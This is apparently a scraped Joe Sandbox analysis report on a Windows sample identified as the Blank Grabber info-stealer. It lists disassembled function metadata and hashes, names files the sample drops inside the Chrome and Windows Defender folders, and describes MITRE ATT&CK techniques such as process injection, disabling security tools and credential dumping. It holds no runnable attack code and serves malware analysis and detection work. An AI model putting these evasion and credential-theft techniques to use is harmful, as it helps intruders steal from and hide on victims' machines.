
csm, xrefs: 00007FF72726F0E6

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction ID: 44b93b663a6aa0ba5526019e8bbc9721b3ad2c1ad662e49ade59a11356d03c54
Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction Fuzzy Hash: F9115B36618B8482EB21DB25F940269B7F0FB89B84F988235DB8D07769DF3DD5528B10

Function 000001F91B2F7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000001F91B2F737C

Strings

riptor at (, xrefs: 000001F91B2F7364
ierarchy Descriptor', xrefs: 000001F91B2F7381

Memory Dump Source

Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd

Similarity

API ID: __std_exception_copy
String ID: ierarchy Descriptor'$riptor at (
API String ID: 592178966-758928094
Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction ID: 12d58e62162825b6678fc96f2147152b50582e89d4dce07ae1e50024a1960a1b
Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction Fuzzy Hash: D1E08671645B46D0DF019F21E8803E873A1DB68B74B4D91329A5C0A351FA38D1FAC300

Function 000001F91B357356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000001F91B35737C

Strings

ierarchy Descriptor', xrefs: 000001F91B357381
riptor at (, xrefs: 000001F91B357364

Memory Dump Source

Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd

Similarity

API ID: __std_exception_copy
String ID: ierarchy Descriptor'$riptor at (
API String ID: 592178966-758928094
Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction ID: 6e455fe08dabb6746cd39f2e90e98ba0f18bb64f2f3ccc0af80a9d30b65a923e
Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction Fuzzy Hash: 0BE08671655B4A90DF059F21E8403E833A5DB58B74B8D9132995C06351FA38D2FAC300

Function 000001F91B2F73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000001F91B2F73D8

Strings

riptor at (, xrefs: 000001F91B2F73C0
Locator', xrefs: 000001F91B2F73DD

Memory Dump Source

Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd

Similarity

API ID: __std_exception_copy
String ID: Locator'$riptor at (
API String ID: 592178966-4215709766
Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction ID: 2c017b3d782f72be88e1e8e3640a669b32029c26a4df4c75265d85afbde3653b
Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction Fuzzy Hash: 9CE08671605B46C0DF019F21D4803E87361EB68B64B8D9132CA4C0A351EA38D1E9C300

Function 000001F91B3573B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000001F91B3573D8

Strings

Locator', xrefs: 000001F91B3573DD
riptor at (, xrefs: 000001F91B3573C0

Memory Dump Source

Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd

Similarity

API ID: __std_exception_copy
String ID: Locator'$riptor at (
API String ID: 592178966-4215709766
Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction ID: cc24065b10ce2f35dfdedbdd280b833903211c4a38c82bc4138c2a7c5bda13cd
Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction Fuzzy Hash: 74E08671616B4A80DF059F21D4402E873A5EB58B64B8D9132C94C06351EA38D2F6C300

Function 000001F91B321BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F91B321C2D
HeapAlloc.KERNEL32 ref: 000001F91B321C3B
GetProcessHeap.KERNEL32 ref: 000001F91B321C77
HeapFree.KERNEL32 ref: 000001F91B321C85

Part of subcall function 000001F91B32152C: StrCmpIW.SHLWAPI ref: 000001F91B32155D

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction ID: 2604c2bf65fef42e8dbb10e5bedcca455ee823efa61a4255f94306f955dce916
Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction Fuzzy Hash: 55115B39A0AB5785EA04AF67E9043BA73A2EB89FE0F1C40749E4D53765DE78C4639300

Function 000001F91B321268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F91B32126E
HeapAlloc.KERNEL32 ref: 000001F91B32127D
GetProcessHeap.KERNEL32 ref: 000001F91B321297
HeapAlloc.KERNEL32 ref: 000001F91B3212A8

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction ID: f80c6889924318740d7ebbb1830da128f222ad2b51ddedb56959b45f5c95aa5d
Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction Fuzzy Hash: 28E06535B066078AE7049F52D80839B36E2FB89F15F08C034CD0907361DF7D84A6D750

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 8Ck8T5qRcC.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Blank Grabber

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

System Summary

Data Obfuscation

Stealing of Sensitive Information

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

C:\Program Files\Windows Defender\en-US\7c80744c9cd64c

C:\Program Files\Windows Defender\en-US\based.exe

Windows Analysis Report
8Ck8T5qRcC.exe

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre